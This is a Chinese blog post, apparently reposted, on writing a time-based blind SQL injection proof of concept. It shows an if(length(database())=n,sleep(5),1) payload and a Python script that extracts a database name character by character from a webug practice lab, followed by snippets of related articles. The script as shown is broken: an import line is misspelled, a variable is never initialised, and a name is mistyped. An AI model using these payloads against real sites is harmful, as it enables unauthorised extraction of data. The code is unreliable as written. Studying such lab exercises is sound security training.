时间盲注poc编写

最新推荐文章于 2023-04-04 21:52:43 发布
最新推荐文章于 2023-04-04 21:52:43 发布
阅读量196 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/hatkids/p/8974200.html
版权

当测试注入漏洞时,页面没有返还结果,连报错都没有时,可以考虑延时。

比如这条语句 ?type=1 and if(length(database())=%d,sleep(5),1)

如果这条语句被服务器正确执行,那么服务器返回数据强要比平时慢5秒,通过比较时间来判断正确还是错误。

这就给我们编程提供了思路,如果要猜测一个字段可以先猜测其长度,在一个猜每一个字符

这次依旧是webug的一道练习题

mport requests
import time

payloads = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,'

print( 'start get length...')
def long():
  for l in range(1,21):
      startTime1=time.time()
      url1 = "http://192.168.148.129/pentest/test/time/?type=1 and if(length(database())=%d,sleep(5),1)"%(l)
      response1 = requests.get(url1)
      if time.time() - startTime1 > 5:
          length=l
          print ("the length is " + str(length))
          break
  return length
def inject():
  print( 'start database sql injection...')
  for d in range(1,length+1):
      for payload in payloads:
          startTime2=time.time()
          url2 = "http://192.168.148.129/pentest/test/time/?type=1 and if(substr(database(),'%d',1)='%s',sleep(5),1)"%(d,payload)
          response2 = requests.get(url2) #
          if time.time() - startTime2 > 5: 
              database+=payload
              print(database)
              break
  return database
if __name__ == '__main__':
  length=long()
  dabase=inject()

  print("the database is " + database)

思路就是先猜字段长度,在与payload里的每个字符进行比较得到最终结果。

 

转载于:https://www.cnblogs.com/hatkids/p/8974200.html

weixin_30699465
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
37-5 基于时间盲注 SQL 注入 PoC 的 Python 编写
weixin_43263566的博客
04-24 156
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
SQL注入之时间盲注
weixin_44029504的博客
04-16 789
时间盲注 ---------------------------------------------------------小小分隔符----------------------------------------------------- 时间盲注原理 完全没有变化的页面!!! 时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判...
渗透测试之POC基于时间的sql盲注
黑面狐
01-03 1739
这次写写基于时间的sql盲注。 当整个页面没有地方显示数据的时候,这时候存在sql注入,我用md5()函数也没有地方响应出来。那么执行什么函数去证明存在注入呢?sleep()函数,页面执行了,sleep()函数后,从发请求到完全响应就有一个固定的延迟时间。 下面来看测试网站: 无论你ID=多少他都是  you are in ..... 基于时间盲注最常见的语句就是  If(asci
渗透测试之POC基于布尔的sql盲注
黑面狐
01-03 1105
基于布尔的盲注一般只能告诉我们true or fasle。 就比如你只能向系统提问,但是系统只能回答你是或者不是。 一般套路是先问数据库名字有多长,1,2,3,4直到回答出是,然后获取到数据库名字长度,然后数据库第一个字符是不是a,b,c,d....直到回答是,获取第一个字符,然后按照这个套路获取到第二个第三个字符最后获取到数据库名称,然后再问表,字段。。 还有另一个套路直接字典的,不过这个
BWAPP——时间盲注(low)
m0_60767986的博客
04-04 179
因为这一关不会有任何异常回显,使用or sleep来判断比较耗时间,所以直接用已知存在的电影名(Iron Man)来拼接语句。如果在输入框输入 a 后台拼接sql语句为。1.先要判断当前数据库库名字符的个数。每一次测试比较耗时间,推荐使用脚本。1.判断是否存在sql延时注入。使用concat以’,‘拼接。2.判断每个数据库库名长度。4.获取当前数据库的表名。1.判断存在有几个数据库
渗透系列之mysql时间盲注
Websec
02-23 1715
渗透系列之mysql时间盲注 学习思路点: 如何判断时间盲注 时间盲注函数介绍 Mysq里面延时注入需要使用到的函数为sleep() 一般使用以下语句进行注入判断,if(exp1,exp2,exp3) 含义就是:如果exp1为真,那么执行exp2,否则执行exp3 简单使用延时注入测试数据库的用户长度,poc为: and if(length(user()>1),1,sl...
poc编写真实案例文档
07-21
poc编写真实案例文档
POC编写指南.pdf
08-17
POC编写指南.pdf POC(Proof of Concept)是指为证明漏洞存在而编写的代码,它是安全界中的一种常见的概念验证程序。POC的存在只是为了证明漏洞的存在,而不是为了利用漏洞。Exploit(漏洞利用程序)则是指可以发挥...
#资源分享达人# POC编写指南.zip
08-03
【标题】 "#资源分享达人# POC编写指南.zip" 是一个专门为信息安全专业人士和爱好者准备的压缩包,其中包含了关于Proof of Concept(PoC编写的详细指导。PoC是一种技术证明,通常在发现安全漏洞时使用,以展示该...
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
POC&EXP编写指南.rar
02-11
POC&EXP编写指南》是一份非常实用的资料,主要涵盖了网络安全领域中的Proof of Concept(POC)和Exploit(EXP)的编写方法。在网络安全研究中,POC是证明某一安全漏洞存在的一种技术性验证,而EXP则是利用这个漏洞...
初探POC编写
博客地址 www.sec0nd.top
07-22 1515
想锻炼一下编程能力,师兄说以后很重要的,最好学好一点但是我又想学习安全相关的,那就来练练pocPoC(全称ProofofConcept),中文译作概念验证。在安全界,你可以理解成为漏洞验证程序(本教程中,如无特别说明,默认代表漏洞验证程序),当然你要强行说我说的不对,我肯定支持你,反正我没打算反驳你。和一些应用程序相比,PoC是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。...
python之poc编写——sql篇
qq_51796436的博客
03-02 6568
sql注入漏洞漏扫单个网站基础sql扫描多个网站sql基础扫描 poc:即验证漏洞是否存在的脚本,也就是扫描器 兄弟们,开始写扫描器啦 sql注入漏洞漏扫 单个网站基础sql扫描 第一步,当然是写request函数啦。除了时间盲注外,1' and 1=2%23就能判断字符型的sql注入
命令执行的poc编写
公众号shadow sock7
06-03 1080
有回显的情况下,碰到可能存在的windows和linux平台,可以执行一个不存在的命令,然后报错返回里有Cannot run program即可。 Windows: 结果:
POC编写基础————1、基础知识
热门推荐
Fly_鹏程万里
02-27 1万+
前言 本系列内容主要讲解POC编写,而笔者也是一个小小白,刚刚学习POC编写不久,打算记录一些心得,有兴趣的可以一起讨论,一起交流,同时可以一起分享各自收藏或者编写POC进行学习! 什么是POC PoC(全称: Proof of Concept), 中文可译作“观点验证程序”,它主要用于证明提出者的观点是否正确,在信息安全领域这种观点一般是我们对于漏洞的判断,即目标系统是否存在漏洞。 ...
一个简单sql注入的poc
weixin_30279315的博客
12-13 558
最近在提高自己编程能力,拿一些实用的小工具练下。该脚本为python语言,主要涉及模块urllib,re。 功能:验证CmsEasy5.5爆账号密码 实验用源码:http://pan.baidu.com/s/1i4lAwBF 搭建环境:phpstudy     试了IIs+php没爆出来最好用phpstudy。 通过浏览器访问确认存在漏洞存在。 用python来实现。 i...
Python黑客学习笔记:从HelloWorld到编写PoC(上)
Thinking and Coding Life
02-24 8374
中文原文地址:http://www.freebuf.com/news/special/58048.html 本系列文章适合CS在读学生和万年工具党,本文会在英文原文的基础上做些修改,并适当增加些解释说明。 本篇包含原文的前几部分: 0x0 – Getting Started      - 从零开始 0x1 – Getting Started Pt.2   - 进阶 0x2 – Por
SQL注入之盲注(布尔盲注时间盲注
c_programj的博客
04-09 6455
SQL之盲注一、布尔盲注常用函数函数替换布尔盲注一般流程二、时间盲注常用函数时间盲注一般流程 一、布尔盲注 当存在SQL注入时,攻击者无法通过页面或请求的返回信息,回显或获取到SQL注入语句的执行结果,这种情况就叫盲注。 布尔型盲注就是利用返回的True或False来判断注入语句是否执行成功。它只会根据你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。 **什么情况下考虑使用布尔盲注?** 1. 该输入框存在注入点。 2. 该页面或请求不会回显注入语句执行结果,故无法使用UNI
【黑客编程】手把手教你编写POC
Zt_Zk的博客
08-26 4607
在安全界可以理解成漏洞验证程序,和一些应用程序相比,PoC 是一段不完整的程序,仅仅是为了证明提出者的观点的一段代码。
poc编写指南pdf
最新发布
11-07
POC编写指南PDF是一份关于编写POC(Proof of Concept)的指南的电子书,通过PDF格式的形式提供给读者。POC是指概念验证,用于验证一个想法、概念或原理的可行性。编写POC时,可以使用各种技术、工具和方法来展示一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值